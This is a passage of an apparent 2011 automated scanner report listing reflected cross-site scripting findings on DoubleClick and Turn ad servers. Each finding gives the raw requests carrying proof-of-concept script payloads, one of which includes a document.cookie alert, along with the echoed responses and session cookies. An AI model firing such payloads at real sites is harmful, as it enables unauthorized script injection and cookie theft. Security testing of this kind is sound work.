Date: Mon, 07 Feb 2011 02:27:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=10813419f04'-alert(1)-'18424983c20&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

1.40. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd73e"-alert(1)-"c148583078f was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134fd73e"-alert(1)-"c148583078f&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134fd73e"-alert(1)-"c148583078f&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "op
...[SNIP]...

1.41. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e22"-alert(1)-"740480bcef9 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f1e22"-alert(1)-"740480bcef9&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f1e22"-alert(1)-"740480bcef9&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

1.42. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bef59'-alert(1)-'24e894d3194 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bef59'-alert(1)-'24e894d3194&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bef59'-alert(1)-'24e894d3194&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

1.43. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bc0b"-alert(1)-"ee4b25273ee was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=5bc0b"-alert(1)-"ee4b25273ee HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5908
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:16 GMT
Expires: Mon, 07 Feb 2011 02:28:16 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=5bc0b"-alert(1)-"ee4b25273eehttp%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var op
...[SNIP]...

1.44. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b432f'-alert(1)-'0eb20d682e8 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=b432f'-alert(1)-'0eb20d682e8 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5908
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:20 GMT
Expires: Mon, 07 Feb 2011 02:28:20 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=b432f'-alert(1)-'0eb20d682e8http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

1.45. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18aaa'-alert(1)-'1667d1ce1b1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=5834879907726065318aaa'-alert(1)-'1667d1ce1b1&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=5834879907726065318aaa'-alert(1)-'1667d1ce1b1&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

1.46. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 132c3"-alert(1)-"27b6307f1fc was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653132c3"-alert(1)-"27b6307f1fc&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653132c3"-alert(1)-"27b6307f1fc&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

1.47. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 933c7"><script>alert(1)</script>c46c0426e93 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=933c7"><script>alert(1)</script>c46c0426e93 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=FM4QLcaMabkQsarcOBMTT_qd1v3GGeBcoJK0MOl0KG-Y481wEkFtGX7HudJA1SwJY9n9GIWJHDTqbWbTuEexfNzeQdD3uMEbsSJGoH6nZcvCzn_rbeUw4N91a2HFDwx7Wl6PMIbl8VoYkne2SJkXTcTcqhcYEXFRrx1COjt-xQdPBFgEFn33aBMbAqV_0XEIioGKZSAftgkVYZTzRayYVmmTJdkIn7237siDdt9MzJqJi5T6FYiHf9o35IlREqTNFveKpsZQ30qpNKi15RJt04BNhaXhDlSq6EvznmypgJEkna5GLuKLpEu7eZEeTMi7F6sK_rp2soXzwueUGRFartfze4TUjaNUIXjW8HpTdIXW8uxzXCZHw_1hR9tJint6dsPDEFhRxd_Mub3GEI1LN-tHiIt90vCIZrFIVkRcrTHWSuqW6r5ZIwUtscKD_QT9RhXOUlzX0--TPsid5EqGlKaR8fzj-CgEMyGy4iMXI1WxKbXh9CKgY6S3LP_zmj75AgqPmyW7n-K57XLwzviwi0UeS0QSNHqXIchkIsQCETGT3yD6yFHAIahzcKETB33UwCPq2GhFCxYySztyqVkKk9fqbN4-YU4FEz0wwkD5vsFOGK_87tDq8e92tNo34emrEgGEUj-NO1cCBiKRN0KNH1ftcOyrV1OLoU5x9aMp-92fSDdx8Pm4E6I95eyuD_EIQOJmu9RYL7YOIJ6DsZdIlrLgwokXGxtO8_jRpe316oYDuH7CMSEB_S7o6Xm3tvDBfH77IJVG0N6dycTdcjtOKF0Cz2TbSViJ-oT4nVLBUOQ7zE-OOnjPRQ6BZXJCY0oCMrkBfNspHfysXvb7GqOmGNAITbT7Z6AmMx12CVhoBV8PCKPJoslzeIPsOadDQ5GApTHEeUcb_20FLCe61hOZos4ND7pDMbh_Nz4asivfvnRRu_fmnuOn7vvqoBU15Zmhn2aVSJry2cIXXaBci8YswRWnz3-1lFmH8NpHbFKrPy3hBObtf8ALhKpons6mVN9Ng_E4yJzpnqztVh_CB-KMHlM4At-mEES-WC-9xjj3t3cnzJw50Wq6BglWv58k-98YkSbTm3kPOUdWBiWoLi0oN0AgeHAdeFjGHSfjDkMzE5p5e_oJDB2Um-liToPNlmN15FjrbRSBV8G9GwEgDofeTOxem0_gMApf3YWMEr3kQAQnXe4HjQMTBDROpzYRLGofXKwaWNtdj1-GtHzOUqyENh2k1W2pFwJOjkpENaGP0tqhG0BtDC_eTH_Ts10GvA6WhyC22lBHkEPeNKFx7RiTWcHRNLuEX2-svGHkdhG53xdJo9qHwXLy45nY7LSpUbn803gUXikBp5CFzTHxBLV0jIUUb9PGuTCtW-hvx86uIjCl7RrDpkAZSszkN92RjKcOSHyDTphfUd0ZqQTAbIYvZtNr_wQwmIEY35OpKNWhyGwNPlAh_ANj4laYRoTBJxnGQ7wgWZt0CSpxlrfASU5W2a6su59vlF-h6V4zet13tlPhRMEiyYm825vPff2nJDmVgFpIKs_vIo7sFsppJ43d8oTEgInxyFT6vScD8wD9aZjmMC0w6HS0HlWcNr1j-PhGS2ikng608Ubz0iz0TtbwhgQZq5IdyfSisA1KqAwL3sZErWVr76O0bqQTEPkhkBBP4vNeu_uKiDKKl73FedJ05pAh6qV14YUcXNrVmSSI1FzEzQ65n9aZSqRKUiLFvw0_FzJQi642bOf20jjwau1yNWbWc_OZc_OPEEY_dnkrDVdmeoMCTOxN_xl7C-3y_RTPHX8tA53fNzl8qfH897V8IhWPCe1DLrZ9lRQtTCZwINCJg6hyABA61hUJaqPVyX7fV7Pa1PW0-yYXb_USKuin2pZCaBr_uY_2UBH6Bm4UktJmd6sVQvXXEqhe9E5LsneRLFWbUdQszzXxD5egB584f5Iq0VaWXCofBTTX6PHG8K6lFCCN0TTnR1jCog1stnuLrLH_TLw0g_9l8j595C25K_O7nXuUqzkznnHJS2oIivO1MtzkhTD8tggahFLAwdtimGiAzgIbfwh3tPXiXBZiPEc6jmaSPplk32IRb7Tl08IFN1OghxmtWT_y47n5TtZS9Ky93uZuiaOzgh6RPqobZokxjCycBjwJJ-OqeZ3YCRoZ5XICuXWVHfipzGbbMT7XgVwScM8a1QBrHN9hJ559oPfWNXLGQYJF8WI3xWHXIXB86oJHZOjQy7IdFPhSTsF2yrOAh9s72IpPTbIy0ryOZR5kHQoGKZaDQPufKDCKOsAs5UyVIQTo0ztnk49jL0nNFaq4usSu0TQiqXjP7CIAd_5FtzMDApKZjTZ9VwWqS_hi3W5FLLAcz8HdwETYSzM0iqfAGlpVHegt_TIDru8ZVGlo2JchDi2BE0kETeswJqfjIM8eqB1CZXkSQ7Z_VjVnYvzBVNyB9AksqD2lQZb2X0IEqN843HNpf9LL79Gl1KBsoCUhcPx0GvFd6LDM_NesCTjn8qfPanRhqfFt_Mz5uEh2A3HFoGkf8ppxZxL6925r_GgrDoF5KcCR0z_dNX3kzjeRcgqW8BhR69hQhpeZrZnEJ52ohaD3WrTkTUj4YJ6Td6PLaDgaJxtMnnZrfAlG0SSD0cpxrho96Q5aYPi9en1l66z-sdlCvM2HwHHvukFOG1d5EaBIpvNzbIjvRqOmzYDhYzHqcbaWBj06fa97gFmB5jdUYj5pSK3CD2Yuk0PK5FYetxUklFsdind5sgdq4uZcD2KLx9Zf7jaxnwz6suaPAnsGTiQgiUvKmhf1LhrytQYKxDy-h4T29iDJXVr_vHZNnZTSMo3FOqO76V7e32Mz948gl-62XtaGUS8uw5NCpnBNXGUaigKHIg84ueIc4t5Yp3YWsvWh2i358DyJOyzgpnBHfTKfL-U_Busa7oEsjSep6DjzyTifPlN_P4smDk3kLq_iHqbXQ5svnKXdR0fKJFj2seLH8BbDFMsPiVsBIQ44v1dSgCalvY0FxkkJ5w0OZeWQP34jwLIAF168EspxmNyBZAxjbmEt8kjG7dRMykkE2LHXhz6x23r28D5B1-HnnnOalxwc8pVPIG67O2v9MtuGBypG0oO1sVM2Vbs7HFOP9G8F0R3RxUgEDCioFUEKPhCNOF99OExqDKIS0y-D3H8kAPjeIydjzyH2Ws7PKyE1dGY4WEg1BMpUBtxwX2H-7BKKuqPq2iSXQ7keQevoGn3niEhwrkx3I523rYfTIHt_4ntge3wT6HrPHWBJpD6Hr91CxZq9sV9Jmp33y8raIDjGaQc_8c0sEToR_ODvxgcgJ32KFhukOoA2cRquiPMf-CiwpIi4ayv6yWP-tXJ__VAnBFQL8j9ZaHEtyQCLoYLPIaWZ3CmWGBp_xNH3WlqbXOyrf_ATBbMNQCTCxOAxrjPhFf5rtBKDWKm24urmdIW_ZXAbYCZmLsz6YiVpaNRjSC9cVWjph0vEeVDn94cCqpnjE0z1BuYxXU6aN8KvfgQRgY4ZaCnGHk-ja9faWwfL-_-bPH3YFMHRKzulr4fOZJphXH_Th5iLN0VczjS8Jh9TEFyiFtC1iUdTIWwbUQ3HeHZgtn1yA0PmWEs3TAjOPMDh8jx0WcV7eT-TG33S7CRXLm9kG5yXyNmxCrzJ; fc=8Kodsw1QIRNJBnpSjhgJ0uErbJkTJYsNaCBFpaSI5yP-4Y1aL5T0hqj7dZyIiRNIWMZgDtcnKM_xOWbKnaMIO3_WyzVPxgN3VkTg_cPuFqziwJJKZupkpjfaBrjFc6z7RfOX1MD02-o6SZ1b0c_HcUiZ1Q4B83ZCB0ZNq2R2Ygc; pf=vcPDWdxa5bRnzYCFna8dt7hwFpEjJFamBf-ed9eCgkru2q8_Jo62qDoNU1sRcsTDbsXLbP8cgvu5kdFpiCdvW34lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15011%7C15011%7C15012%7Cundefined%7C15011%7C15011%7C15011%7C15011%7C15011%7C15011%7C15011%7C14983%7C15011%7C15003; rv=1

Response

HTTP/1.1 200 OK
